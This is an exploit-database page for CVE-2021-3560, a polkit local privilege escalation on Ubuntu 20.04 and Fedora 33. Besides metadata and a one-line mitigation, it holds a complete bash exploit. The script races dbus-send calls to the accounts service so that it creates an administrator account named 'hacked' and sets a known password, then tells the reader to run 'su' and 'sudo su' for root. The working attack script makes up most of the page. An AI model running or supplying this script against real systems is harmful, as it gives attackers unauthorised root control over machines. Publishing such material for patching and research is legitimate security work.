header-logo
Suggest Exploit
vendor:
polkit
by:
J Smith (CadmusofThebes)
7,8
CVSS
HIGH
Local Privilege Escalation
264
CWE
Product Name: polkit
Affected Version From: 0.105-26 (Ubuntu), 0.117-2 (Fedora)
Affected Version To: 0.105-26 (Ubuntu), 0.117-2 (Fedora)
Patch Exists: YES
Related CWE: CVE-2021-3560
CPE: a:freedesktop:polkit
Metasploit: https://www.rapid7.com/db/vulnerabilities/rocky_linux-cve-2021-3560/https://www.rapid7.com/db/vulnerabilities/alma_linux-cve-2021-3560/https://www.rapid7.com/db/vulnerabilities/redhat-openshift-cve-2021-3560/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp9-cve-2021-3560/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp8-cve-2021-3560/https://www.rapid7.com/db/vulnerabilities/oracle-solaris-cve-2021-3560/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2021-3560/https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2021-3560/https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2021-3560/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2021-3560/https://www.rapid7.com/db/vulnerabilities/suse-cve-2021-3560/https://www.rapid7.com/db/vulnerabilities/oracle_linux-cve-2021-3560/https://www.rapid7.com/db/vulnerabilities/redhat_linux-cve-2021-3560/
Other Scripts: https://www.infosecmatter.com/nessus-plugin-library/?id=150314https://www.infosecmatter.com/nessus-plugin-library/?id=150164https://www.infosecmatter.com/nessus-plugin-library/?id=150283https://www.infosecmatter.com/nessus-plugin-library/?id=153699https://www.infosecmatter.com/nessus-plugin-library/?id=150319https://www.infosecmatter.com/nessus-plugin-library/?id=150242https://www.infosecmatter.com/nessus-plugin-library/?id=150384https://www.infosecmatter.com/metasploit-module-library/?mm=exploit/linux/local/polkit_dbus_auth_bypasshttps://www.infosecmatter.com/nessus-plugin-library/?id=90768https://www.infosecmatter.com/nessus-plugin-library/?id=153223
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Ubuntu 20.04, Fedora 33
2021

Polkit 0.105-26 0.117-2 – Local Privilege Escalation

This exploit is related to CVE-2021-3560, which is a privilege escalation vulnerability in polkit versions 0.105-26 (Ubuntu) and 0.117-2 (Fedora). The exploit creates a new user with administrator privileges, sets the password, and then logs in as the new user. The exploit uses dbus-send timing to bypass authentication.

Mitigation:

Upgrade to the latest version of polkit, which is not vulnerable to this exploit.
Source

Exploit-DB raw data:

# Exploit Title: Polkit 0.105-26 0.117-2 - Local Privilege Escalation
# Date: 06/11/2021
# Exploit Author: J Smith (CadmusofThebes)
# Vendor Homepage: https://www.freedesktop.org/
# Software Link: https://www.freedesktop.org/software/polkit/docs/latest/polkitd.8.html
# Version: polkit 0.105-26 (Ubuntu), polkit 0.117-2 (Fedora)
# Tested on: Ubuntu 20.04, Fedora 33
# CVE: CVE-2021-3560
# Source: https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/

#!/bin/bash

# Set the name and display name
userName="hacked"
realName="hacked"

# Set the account as an administrator
accountType=1 

# Set the password hash for 'password' and password hint
password='$5$WR3c6uwMGQZ/JEZw$OlBVzagNJswkWrKRSuoh/VCrZv183QpZL7sAeskcoTB'
passHint="password"

# Check Polkit version
polkitVersion=$(systemctl status polkit.service | grep version | cut -d " " -f 9)
if [[ "$(apt list --installed 2>/dev/null | grep polkit | grep -c 0.105-26)" -ge 1 || "$(yum list installed | grep polkit | grep -c 0.117-2)" ]]; then
    echo "[*] Vulnerable version of polkit found"
else
    echo "[!] WARNING: Version of polkit might not vulnerable"
fi

# Validate user is running in SSH instead of desktop terminal
if [[ -z $SSH_CLIENT || -z $SSH_TTY ]]; then
    echo "[!] WARNING: SSH into localhost first before running this script in order to avoid authentication prompts"
    exit
fi

# Test the dbus-send timing to load into exploit
echo "[*] Determining dbus-send timing"
realTime=$( TIMEFORMAT="%R"; { time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:$userName string:$realName int32:$accountType ; } 2>&1 | cut -d " " -f6 )
halfTime=$(echo "scale=3;$realTime/2" | bc)

# Check for user first in case previous run of script failed on password set
if id "$userName" &>/dev/null; then
    userid=$(id -u $userName)
    echo "[*] New user $userName already exists with uid of $userid"
else
    userid=""
	echo "[*] Attempting to create account"
    while [[ $userid == "" ]]
    do
        dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:$userName string:$realName int32:$accountType 2>/dev/null & sleep $halfTime ; kill $! 2>/dev/null
        if id "$userName" &>/dev/null; then
	    userid=$(id -u $userName)
            echo "[*] New user $userName created with uid of $userid"
        fi
    done
fi

# Add the password to /etc/shadow
# Sleep added to ensure there is enough of a delay between timestamp checks
echo "[*] Adding password to /etc/shadow and enabling user"
sleep 1
currentTimestamp=$(stat -c %Z /etc/shadow)
fileChanged="n"
while [ $fileChanged == "n" ]
do 
    dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User$userid org.freedesktop.Accounts.User.SetPassword string:$password string:$passHint 2>/dev/null & sleep $halfTime ; kill $! 2>/dev/null
	if [ $(stat -c %Z /etc/shadow) -ne $currentTimestamp ];then
	    fileChanged="y"
	    echo "[*] Exploit complete!"
	fi
done

echo ""
echo "[*] Run 'su - $userName', followed by 'sudo su' to gain root access"

Navigation

Suggest Exploit

Services By CQR